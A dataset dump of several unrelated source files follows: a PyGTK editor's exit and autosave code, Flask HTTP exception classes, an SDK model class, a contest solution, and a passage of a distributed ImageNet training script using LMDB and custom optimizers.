self.statusbar.pop(0)
if not strx:
self.statusbar.push("Idle")
return
self.statusbar.push(0, strx)
self.statuscount = STATUSCOUNT
pass
def update_resize_grip(self, widget, event):
#print "update state", event, event.changed_mask
#self.window.set_focus(notebook)
mask = gtk.gdk.WINDOW_STATE_MAXIMIZED | gtk.gdk.WINDOW_STATE_FULLSCREEN
if (event.changed_mask & mask):
self.statusbar.set_has_resize_grip(not (event.new_window_state & mask))
# ------------------------------------------------------------------------
def OnExit(arg, prompt = True):
#print "onexit"
arg.set_title("Exiting ...")
# Save UI related data
pos = mained.hpaned.get_position()
pos = max(pos, 1)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/hpaned", pos)
firstpage = notebook.get_nth_page(0)
if firstpage:
pos = firstpage.get_position()
pos = max(pos, 1)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/vpaned", pos)
# Do not save full screen coordinates (when used F11)
if not mained.full:
xx, yy = mained.window.get_position()
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/xx", xx)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/yy", yy)
ww, hh = mained.window.get_size()
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/ww", ww)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/hh", hh)
# Save current doc:
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
gconf.client_get_default().set_string\
(pedconfig.conf.config_reg + "/curr",\
vcurr.area.fname)
# Prompt for save files
nn = notebook.get_n_pages(); cnt = 0
while True:
if cnt >= nn: break
ppp = notebook.get_nth_page(cnt)
#print "page:", ppp.area
ppp.area.saveparms()
ss = "/sess_%d" % cnt
if cnt < 8:
gconf.client_get_default().set_string\
(pedconfig.conf.config_reg + ss,\
ppp.area.fname)
if prompt:
if ppp.area.changed:
msg = "\nWould you like to save:\n\n \"%s\" \n" % ppp.area.fname
rp = pedync.yes_no_cancel("pyedit: Save File ?", msg)
if rp == gtk.RESPONSE_YES:
ppp.area.save()
if rp == gtk.RESPONSE_NO:
#print "gtk.RESPONSE_NO"
pass
if rp == gtk.RESPONSE_CANCEL or \
rp == gtk.RESPONSE_REJECT or \
rp == gtk.RESPONSE_CLOSE or \
rp == gtk.RESPONSE_DELETE_EVENT:
return
else:
# Rescue to temporary:
if ppp.area.changed:
hhh = hash_name(ppp.area.fname) + ".rescue"
xfile = pedconfig.conf.config_dir + "/" + hhh
print "Rescuing", xfile
writefile(xfile, ppp.area.text)
cnt += 1
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/cnt",\
cnt)
# Exit here
gtk.main_quit()
#print "OnExit called \"" + arg.get_title() + "\""
# ------------------------------------------------------------------------
def handler(signum, frame):
try:
#print 'Signal handler called with signal', signum
global notebook
if pedconfig.conf.idle:
pedconfig.conf.idle -= 1
if pedconfig.conf.idle == 0:
vcurr = notebook.get_nth_page(notebook.get_current_page())
# Rescue to save:
if vcurr:
if vcurr.area.changed:
hhh = hash_name(vcurr.area.fname) + ".sav"
xfile = pedconfig.conf.config_dir + "/" + hhh
writefile(xfile, vcurr.area.text)
#strx = "Backed up file '{0:s}'".format(xfile)
# This will raise exception
#self.update_statusbar(strx)
if pedconfig.conf.syncidle:
pedconfig.conf.syncidle -= 1
if pedconfig.conf.syncidle == 0:
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
if vcurr.area.changed:
vcurr.area2.text = vcurr.area.text
vcurr.area2.invalidate()
if pedconfig.conf.pedwin.statuscount:
pedconfig.conf.pedwin.statuscount -= 1
if pedconfig.conf.pedwin.statuscount == 0:
pedconfig.conf.pedwin.update_statusbar("Idle.");
pedconfig.conf.pedwin.statuscount = 0
except:
print "Exception in timer handler"
signal.alarm(1)
| [
"[email protected]"
] | |
3df0a1ceeeace730a593525fe10af770673e4a9f | 57522f0bdc09c57e32f8a8e34e4c5da64aedbc86 | /ERROR_UNUSUAL/ERROE_FROM_PYTHON.py | 6ce889b0debfc93ea890cfb822d651f105813efb | [] | no_license | Alexanderklau/Start_again-python- | 97b30345e2ef13d4552d7efd82498e7e615c262e | 7ffbc2a6d53e1cff1c57258169c66bbab87210bc | refs/heads/master | 2021-01-19T03:27:53.865013 | 2017-05-01T13:47:31 | 2017-05-01T13:47:31 | 87,314,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | # -*-coding:utf-8 -*-
__author__ = 'Yemilice_lau'
# NameError
# ZeroDivisionError
# SyntaxError
# KeyError
# IOError
# AttributeError
# ImportError
# ๆฃๆตๅผๅธธ
try:
try_site()#ๆฃๆต่ฟ้็ๅผๅธธ
except IOError,e:
print 'Error is:',e
# if __name__ == '__main__': | [
"[email protected]"
] | |
e54187180a4b3c1c7bb03c5ea33d3a7e525b28f0 | 7327ec847993aee7d19f647499a99aaa335894f0 | /ExceptionsClasses.py | 5f39dbc10b34c380ebfc8c145d7c28bb7d60478b | [] | no_license | chetat/chingu-journal | ae56749fd62076ab31398afbcd78acef22519033 | 1a6ef77075e866d08613a884d474303e96cb7aa8 | refs/heads/master | 2023-02-05T08:13:38.987587 | 2019-08-29T22:33:36 | 2019-08-29T22:33:36 | 200,136,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,728 | py | from flask import jsonify
class BadRequest(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class ResourceExist(Exception):
status_code = 409
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class UnAuthorized(Exception):
status_code = 401
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class NotAcceptable(Exception):
status_code = 406
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class UnprocessableEntity(Exception):
status_code = 422
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class NotFound(Exception):
status_code = 404
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class InternalServerError(Exception):
status_code = 500
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class Forbiden(Exception):
status_code = 403
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class MethodNotAllowed(Exception):
status_code = 405
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
| [
"[email protected]"
] | |
4d080f5004c60a7a65725ed543f71140381ea82a | 665455c521cc7cf76c5436337ed545de90976af4 | /cohesity_management_sdk/models/protection_runs_stats.py | 07e3d61720f3193a37daf1c0aaeaedb77522bcca | [
"Apache-2.0"
] | permissive | hsantoyo2/management-sdk-python | d226273bc8eedcf9220ea4999a6f0b9a1a30d99c | 0093194d125fc6746f55b8499da1270c64f473fc | refs/heads/master | 2023-03-01T06:09:39.644085 | 2021-01-15T08:23:16 | 2021-01-15T08:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,044 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class ProtectionRunsStats(object):
"""Implementation of the 'ProtectionRunsStats' model.
Specifies the Protection Runs statistics response.
Attributes:
num_archival_runs (long|int): Specifies the count of archival Runs.
num_backup_runs (long|int): Specifies the count of backup Runs.
num_replication_runs (long|int): Specifies the count of replication
Runs.
"""
# Create a mapping from Model property names to API property names
_names = {
"num_archival_runs":'numArchivalRuns',
"num_backup_runs":'numBackupRuns',
"num_replication_runs":'numReplicationRuns'
}
def __init__(self,
num_archival_runs=None,
num_backup_runs=None,
num_replication_runs=None):
"""Constructor for the ProtectionRunsStats class"""
# Initialize members of the class
self.num_archival_runs = num_archival_runs
self.num_backup_runs = num_backup_runs
self.num_replication_runs = num_replication_runs
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
num_archival_runs = dictionary.get('numArchivalRuns')
num_backup_runs = dictionary.get('numBackupRuns')
num_replication_runs = dictionary.get('numReplicationRuns')
# Return an object of this model
return cls(num_archival_runs,
num_backup_runs,
num_replication_runs)
| [
"[email protected]"
] | |
0c27d20fdc87eca7ffd5e3dd23dc7183700d8b76 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /atcoder/abc152_a.py | 9ff50dea04ec97c69fb7147455ba99f12c361aed | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | # https://atcoder.jp/contests/abc152/tasks/abc152_a
N, M = map(int, input().split())
if N == M:
print('Yes')
else:
print('No')
| [
"[email protected]"
] | |
c1cb40301e773f59af6f3d697501c53cd539d985 | 95884a6b32f6831e68c95d7785bc968a56877121 | /cifar_imagenet/imagenet_lmdb_fixed_drop.py | b0cceb1b5a01f6c87a137f3495ed598b0687dd30 | [
"MIT",
"Apache-2.0"
] | permissive | minhtannguyen/RAdam | d89c4c6ce1ce0dd95b0be3aa2c20e70ea62da8b0 | 44f403288df375bae0785cc82dd8c888eaaaa441 | refs/heads/master | 2020-08-09T07:53:50.601789 | 2020-02-17T06:17:05 | 2020-02-17T06:17:05 | 214,041,479 | 0 | 0 | Apache-2.0 | 2019-10-09T23:11:14 | 2019-10-09T23:11:14 | null | UTF-8 | Python | false | false | 25,843 | py | '''
Training script for ImageNet
Copyright (c) Wei YANG, 2017
'''
from __future__ import print_function
import argparse
import os
import shutil
import time
import random
import fcntl
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data as data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import models.imagenet as customized_models
from utils import Bar, Logger, AverageMeter, mkdir_p, savefig, LoggerDistributed
from utils.radam import RAdam, AdamW
from utils.lsradam import LSRAdam, LSAdamW
from optimizers.sgd_adaptive3 import *
from optimizers.SRAdamW import *
from optimizers.SRRAdam import *
from tensorboardX import SummaryWriter
# for loading LMDB
from apex.parallel import DistributedDataParallel as DDP
from apex.fp16_utils import to_python_float
import io
from PIL import Image
try:
import lmdb
except:
pass
import torch.distributed as dist
# Models
default_model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
customized_models_names = sorted(name for name in customized_models.__dict__
if name.islower() and not name.startswith("__")
and callable(customized_models.__dict__[name]))
for name in customized_models.__dict__:
if name.islower() and not name.startswith("__") and callable(customized_models.__dict__[name]):
models.__dict__[name] = customized_models.__dict__[name]
model_names = default_model_names + customized_models_names
# Parse arguments
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
# Datasets
parser.add_argument('-d', '--data', default='path to dataset', type=str)
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
# Optimization options
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--train-batch', default=256, type=int, metavar='N',
help='train batchsize (default: 256)')
parser.add_argument('--test-batch', default=200, type=int, metavar='N',
help='test batchsize (default: 200)')
parser.add_argument('--optimizer', default='sgd', type=str, help='optimizer sgd|adam|radam')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate')
parser.add_argument('--beta1', default=0.9, type=float,
help='beta1 for adam')
parser.add_argument('--beta2', default=0.999, type=float,
help='beta2 for adam')
parser.add_argument('--drop', '--dropout', default=0, type=float,
metavar='Dropout', help='Dropout ratio')
parser.add_argument('--schedule', type=int, nargs='+', default=[150, 225],
help='Decrease learning rate at these epochs.')
parser.add_argument('--restart-schedule', type=int, nargs='+', default=[80, 200, 500, 1000],
help='Restart at after these amounts of epochs.')
parser.add_argument('--gamma', type=float, default=0.1, help='LR is multiplied by gamma on schedule.')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
# Checkpoints
parser.add_argument('-c', '--checkpoint', default='checkpoint', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
# Architecture
parser.add_argument('--arch', '-a', metavar='ARCH', default='resnet18',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: resnet18)')
parser.add_argument('--depth', type=int, default=29, help='Model depth.')
parser.add_argument('--cardinality', type=int, default=32, help='ResNet cardinality (group).')
parser.add_argument('--base-width', type=int, default=4, help='ResNet base width.')
parser.add_argument('--widen-factor', type=int, default=4, help='Widen factor. 4 -> 64, 8 -> 128, ...')
# Miscs
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
help='use pre-trained model')
#Device options
parser.add_argument('--gpu-id', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--model_name', default='sgd')
# DALI
parser.add_argument('--dali_cpu', action='store_true',
help='Runs CPU based version of DALI pipeline.')
parser.add_argument('--local_rank', type=int, default=0,
help='rank of process')
# LSAdam
parser.add_argument('--sigma', default=0.1, type=float, help='sigma in LSAdam')
args = parser.parse_args()
# Set up DDP.
args.distributed = True
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
args.world_size = torch.distributed.get_world_size()
state = {k: v for k, v in args._get_kwargs()}
# logger
if args.local_rank == 0:
if not os.path.exists(args.checkpoint): os.makedirs(args.checkpoint)
writer = SummaryWriter(os.path.join(args.checkpoint, 'tensorboard')) # write to tensorboard
# Use CUDA
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
use_cuda = torch.cuda.is_available()
# Random seed
if args.manualSeed is None:
args.manualSeed = random.randint(1, 10000)
random.seed(args.manualSeed)
cudnn.benchmark = True
torch.manual_seed(args.manualSeed)
cudnn.enabled = True
if use_cuda:
torch.cuda.manual_seed_all(args.manualSeed)
# Subroutines for lmdb_loader
def lmdb_loader(path, lmdb_data):
# In-memory binary streams
with lmdb_data.begin(write=False, buffers=True) as txn:
bytedata = txn.get(path.encode('ascii'))
img = Image.open(io.BytesIO(bytedata))
return img.convert('RGB')
def imagenet_lmdb_dataset(
root, transform=None, target_transform=None,
loader=lmdb_loader):
if root.endswith('/'):
root = root[:-1]
pt_path = os.path.join(
root + '_faster_imagefolder.lmdb.pt')
lmdb_path = os.path.join(
root + '_faster_imagefolder.lmdb')
if os.path.isfile(pt_path) and os.path.isdir(lmdb_path):
print('Loading pt {} and lmdb {}'.format(pt_path, lmdb_path))
data_set = torch.load(pt_path)
else:
data_set = datasets.ImageFolder(
root, None, None, None)
torch.save(data_set, pt_path, pickle_protocol=4)
print('Saving pt to {}'.format(pt_path))
print('Building lmdb to {}'.format(lmdb_path))
env = lmdb.open(lmdb_path, map_size=1e12)
with env.begin(write=True) as txn:
for path, class_index in data_set.imgs:
with open(path, 'rb') as f:
data = f.read()
txn.put(path.encode('ascii'), data)
data_set.lmdb_data = lmdb.open(
lmdb_path, readonly=True, max_readers=1, lock=False, readahead=False,
meminit=False)
# reset transform and target_transform
data_set.samples = data_set.imgs
data_set.transform = transform
data_set.target_transform = target_transform
data_set.loader = lambda path: loader(path, data_set.lmdb_data)
return data_set
best_top1 = 0 # best test top1 accuracy
best_top5 = 0 # best test top5 accuracy
batch_time_global = AverageMeter()
data_time_global = AverageMeter()
def main():
global best_top1, best_top5
start_epoch = args.start_epoch # start from epoch 0 or last checkpoint epoch
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
# Data loading code
traindir = os.path.join(args.data, 'train')
validdir = os.path.join(args.data, 'val')
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
train_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
val_transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])
train_data = imagenet_lmdb_dataset(traindir, transform=train_transform)
valid_data = imagenet_lmdb_dataset(validdir, transform=val_transform)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
train_loader = torch.utils.data.DataLoader(
train_data, batch_size=args.train_batch,
shuffle=(train_sampler is None),
pin_memory=True, num_workers=8, sampler=train_sampler)
val_loader = torch.utils.data.DataLoader(
valid_data, batch_size=args.test_batch, shuffle=False,
pin_memory=True, num_workers=8)
# create model
if args.pretrained:
print("=> using pre-trained model '{}'".format(args.arch))
model = models.__dict__[args.arch](pretrained=True)
elif args.arch.startswith('resnext'):
model = models.__dict__[args.arch](
baseWidth=args.base_width,
cardinality=args.cardinality,
)
else:
print("=> creating model '{}'".format(args.arch))
model = models.__dict__[args.arch]()
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = DDP(model.features)
model.cuda()
else:
model = model.cuda()
model = DDP(model, delay_allreduce=True)
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda()
if args.optimizer.lower() == 'sgd':
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
elif args.optimizer.lower() == 'adamw':
optimizer = AdamW(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), weight_decay=args.weight_decay, warmup = 0)
elif args.optimizer.lower() == 'radam':
optimizer = RAdam(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), weight_decay=args.weight_decay)
elif args.optimizer.lower() == 'lsadam':
optimizer = LSAdamW(model.parameters(), lr=args.lr*((1.+4.*args.sigma)**(0.25)),
betas=(args.beta1, args.beta2),
weight_decay=args.weight_decay,
sigma=args.sigma)
elif args.optimizer.lower() == 'lsradam':
sigma = 0.1
optimizer = LSRAdam(model.parameters(), lr=args.lr*((1.+4.*args.sigma)**(0.25)),
betas=(args.beta1, args.beta2),
weight_decay=args.weight_decay,
sigma=args.sigma)
elif args.optimizer.lower() == 'srsgd':
iter_count = 1
optimizer = SGD_Adaptive(model.parameters(), lr=args.lr, weight_decay=args.weight_decay, iter_count=iter_count, restarting_iter=args.restart_schedule[0])
elif args.optimizer.lower() == 'sradam':
iter_count = 1
optimizer = SRNAdam(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), iter_count=iter_count, weight_decay=args.weight_decay, restarting_iter=args.restart_schedule[0])
elif args.optimizer.lower() == 'sradamw':
iter_count = 1
optimizer = SRAdamW(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), iter_count=iter_count, weight_decay=args.weight_decay, warmup = 0, restarting_iter=args.restart_schedule[0])
elif args.optimizer.lower() == 'srradam':
#NOTE: need to double-check this
iter_count = 1
optimizer = SRRAdam(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), iter_count=iter_count, weight_decay=args.weight_decay, warmup = 0, restarting_iter=args.restart_schedule[0])
schedule_index = 1
# Resume
title = 'ImageNet-' + args.arch
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
assert os.path.isfile(args.resume), 'Error: no checkpoint directory found!'
# args.checkpoint = os.path.dirname(args.resume)
# checkpoint = torch.load(args.resume, map_location = lambda storage, loc: storage.cuda(args.local_rank))
checkpoint = torch.load(args.resume, map_location = torch.device('cpu'))
best_top1 = checkpoint['best_top1']
best_top5 = checkpoint['best_top5']
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
if args.optimizer.lower() == 'srsgd' or args.optimizer.lower() == 'sradam' or args.optimizer.lower() == 'sradamw' or args.optimizer.lower() == 'srradam':
iter_count = optimizer.param_groups[0]['iter_count']
schedule_index = checkpoint['schedule_index']
state['lr'] = optimizer.param_groups[0]['lr']
if args.checkpoint == args.resume:
logger = LoggerDistributed(os.path.join(args.checkpoint, 'log.txt'), rank=args.local_rank, title=title, resume=True)
else:
logger = LoggerDistributed(os.path.join(args.checkpoint, 'log.txt'), rank=args.local_rank, title=title)
if args.local_rank == 0:
logger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Top1', 'Valid Top1', 'Train Top5', 'Valid Top5'])
else:
logger = LoggerDistributed(os.path.join(args.checkpoint, 'log.txt'), rank=args.local_rank, title=title)
if args.local_rank == 0:
logger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Top1', 'Valid Top1', 'Train Top5', 'Valid Top5'])
if args.local_rank == 0:
logger.file.write(' Total params: %.2fM' % (sum(p.numel() for p in model.parameters())/1000000.0))
if args.evaluate:
if args.local_rank == 0:
logger.file.write('\nEvaluation only')
test_loss, test_top1, test_top5 = test(val_loader, model, criterion, start_epoch, use_cuda, logger)
if args.local_rank == 0:
logger.file.write(' Test Loss: %.8f, Test Top1: %.2f, Test Top5: %.2f' % (test_loss, test_top1, test_top5))
return
# Train and val
for epoch in range(start_epoch, args.epochs):
# Shuffle the sampler.
train_loader.sampler.set_epoch(epoch + args.manualSeed)
if args.optimizer.lower() == 'srsgd':
if epoch in args.schedule:
optimizer = SGD_Adaptive(model.parameters(), lr=args.lr * (args.gamma**schedule_index), weight_decay=args.weight_decay, iter_count=iter_count, restarting_iter=args.restart_schedule[schedule_index])
schedule_index += 1
if epoch == 70:
current_restarting_iter = args.restart_schedule[schedule_index]
optimizer = SGD_Adaptive(model.parameters(), lr=args.lr * (args.gamma**schedule_index), weight_decay=args.weight_decay, iter_count=iter_count, restarting_iter=current_restarting_iter)
else:
adjust_learning_rate(optimizer, epoch)
if args.local_rank == 0:
logger.file.write('\nEpoch: [%d | %d] LR: %f' % (epoch + 1, args.epochs, state['lr']))
if args.optimizer.lower() == 'srsgd' or args.optimizer.lower() == 'sradam' or args.optimizer.lower() == 'sradamw' or args.optimizer.lower() == 'srradam':
train_loss, train_top1, train_top5, iter_count = train(train_loader, model, criterion, optimizer, epoch, use_cuda, logger)
else:
train_loss, train_top1, train_top5 = train(train_loader, model, criterion, optimizer, epoch, use_cuda, logger)
test_loss, test_top1, test_top5 = test(val_loader, model, criterion, epoch, use_cuda, logger)
# append logger file
if args.local_rank == 0:
logger.append([state['lr'], train_loss, test_loss, train_top1, test_top1, train_top5, test_top5])
writer.add_scalars('train_loss', {args.model_name: train_loss}, epoch)
writer.add_scalars('test_loss', {args.model_name: test_loss}, epoch)
writer.add_scalars('train_top1', {args.model_name: train_top1}, epoch)
writer.add_scalars('test_top1', {args.model_name: test_top1}, epoch)
writer.add_scalars('train_top5', {args.model_name: train_top5}, epoch)
writer.add_scalars('test_top5', {args.model_name: test_top5}, epoch)
# save model
is_best = test_top1 > best_top1
best_top1 = max(test_top1, best_top1)
best_top5 = max(test_top5, best_top5)
if args.local_rank == 0:
save_checkpoint({
'epoch': epoch + 1,
'schedule_index': schedule_index,
'state_dict': model.state_dict(),
'top1': test_top1,
'top5': test_top5,
'best_top1': best_top1,
'best_top5': best_top5,
'optimizer' : optimizer.state_dict(),
}, is_best, epoch, checkpoint=args.checkpoint)
if epoch == args.schedule[-1]:
logger.file.write('Best top1: %f at epoch %i'%(best_top1, epoch))
logger.file.write('Best top5: %f at epoch %i'%(best_top5, epoch))
print('Best top1: %f at epoch %i'%(best_top1, epoch))
print('Best top5: %f at epoch %i'%(best_top5, epoch))
with open("./all_results_imagenet.txt", "a") as f:
fcntl.flock(f, fcntl.LOCK_EX)
f.write("%s\n"%args.checkpoint)
f.write("best_top1 %f, best_top5 %f at epoch %i\n\n"%(best_top1,best_top5,epoch))
fcntl.flock(f, fcntl.LOCK_UN)
if args.local_rank == 0:
logger.file.write('Best top1: %f'%best_top1)
logger.file.write('Best top5: %f'%best_top5)
logger.close()
logger.plot()
savefig(os.path.join(args.checkpoint, 'log.eps'))
print('Best top1: %f'%best_top1)
print('Best top5: %f'%best_top5)
with open("./all_results_imagenet.txt", "a") as f:
fcntl.flock(f, fcntl.LOCK_EX)
f.write("%s\n"%args.checkpoint)
f.write("best_top1 %f, best_top5 %f\n\n"%(best_top1,best_top5))
fcntl.flock(f, fcntl.LOCK_UN)
def train(train_loader, model, criterion, optimizer, epoch, use_cuda, logger):
global batch_time_global, data_time_global
# switch to train mode
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
end = time.time()
train_loader_len = len(train_loader)
# print('Length of train loader = %i\n'%train_loader_len)
bar = Bar('Processing', max=train_loader_len)
for batch_idx, (inputs, targets) in enumerate(train_loader):
# measure data loading time
data_time_lap = time.time() - end
data_time.update(data_time_lap)
if epoch > 0:
data_time_global.update(data_time_lap)
n = inputs.size(0)
if use_cuda:
inputs = inputs.cuda()
targets = targets.cuda()
# print('input size = %i, device %s\n'%(inputs.size(0), inputs.device))
# compute output
optimizer.zero_grad()
outputs = model(inputs)
loss = criterion(outputs, targets)
# Backward and step.
loss.backward()
optimizer.step()
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs, targets, topk=(1, 5))
reduced_loss = reduce_tensor(loss.data, args.world_size)
prec1 = reduce_tensor(prec1, args.world_size)
prec5 = reduce_tensor(prec5, args.world_size)
losses.update(to_python_float(reduced_loss), n)
top1.update(to_python_float(prec1), n)
top5.update(to_python_float(prec5), n)
# for restarting
if args.optimizer.lower() == 'srsgd' or args.optimizer.lower() == 'sradam' or args.optimizer.lower() == 'sradamw' or args.optimizer.lower() == 'srradam':
iter_count, iter_total = optimizer.update_iter()
# measure elapsed time
batch_time_lap = time.time() - end
batch_time.update(batch_time_lap)
if epoch > 0:
batch_time_global.update(batch_time_lap)
end = time.time()
# plot progress
bar.suffix = '(Epoch {epoch}, {batch}/{size}) Data: {data:.3f}s/{data_global:.3f}s | Batch: {bt:.3f}s/{bt_global:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
epoch=epoch,
batch=batch_idx + 1,
size=train_loader_len,
data=data_time.val,
data_global=data_time_global.avg,
bt=batch_time.val,
bt_global=batch_time_global.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
if args.local_rank == 0:
logger.file.write(bar.suffix)
bar.finish()
if args.optimizer.lower() == 'srsgd' or args.optimizer.lower() == 'sradam' or args.optimizer.lower() == 'sradamw' or args.optimizer.lower() == 'srradam':
return (losses.avg, top1.avg, top5.avg, iter_count)
else:
return (losses.avg, top1.avg, top5.avg)
def test(val_loader, model, criterion, epoch, use_cuda, logger):
global best_top1, best_top5
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
val_loader_len = len(val_loader)
bar = Bar('Processing', max=val_loader_len)
for batch_idx, (inputs, targets) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
n=inputs.size(0)
if use_cuda:
inputs = inputs.cuda()
targets = targets.cuda()
# compute output
outputs = model(inputs)
loss = criterion(outputs, targets)
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs, targets, topk=(1, 5))
losses.update(loss.item(), n)
top1.update(prec1.item(), n)
top5.update(prec5.item(), n)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '(Epoch {epoch}, {batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
epoch=epoch,
batch=batch_idx + 1,
size=val_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
if args.local_rank == 0:
logger.file.write(bar.suffix)
bar.next()
bar.finish()
return (losses.avg, top1.avg, top5.avg)
def save_checkpoint(state, is_best, epoch, checkpoint='checkpoint', filename='checkpoint.pth.tar'):
filepath = os.path.join(checkpoint, filename)
torch.save(state, filepath)
next_epoch = epoch + 1
next_two_epoch = epoch + 2
if is_best:
